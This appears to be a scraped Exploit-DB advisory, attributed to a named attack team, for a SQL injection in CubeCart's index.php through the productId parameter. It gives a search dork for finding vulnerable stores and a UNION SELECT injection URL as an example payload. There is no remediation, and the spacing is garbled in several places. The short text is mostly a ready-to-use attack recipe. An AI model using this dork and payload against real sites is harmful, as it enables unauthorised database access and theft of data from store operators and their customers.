# Title: CubeCart (index. php) SQL Injection Vulnerability
# EDB-ID: 11495
# CVE-ID :()
# OSVDB-ID :()
# Author: AtT4CKxT3rR0r1ST
# Published: 2010-02-18
# Verified: yes
# Download Exploit Code
# Download N/
View source print? CubeCart (index. php) SQL Injection Vulnerability
========================================================== ======================================
######################################## ############################
..:. Author: AtT4CKxT3rR0r1ST [F.Hack@w.cn]
..:. Team: Sec Attack Team
..:. Home: www.sec-attack.com/vb
.:. Script: http://www.cubecart.com/downloads/
..:. Dork: "powered by CubeCart" inurl: "index. php? _ A ="
######################################## ############################
=== [Exploit] ===
Www.site.com/index.php? _ A = viewProd & productId = 22 [SQL Injection]
=== [Example] ===
Http: // server/store/index. php? _ A = viewProd & productId = 22 + and + 1 = 2 + union + select + version ()
######################################## ############################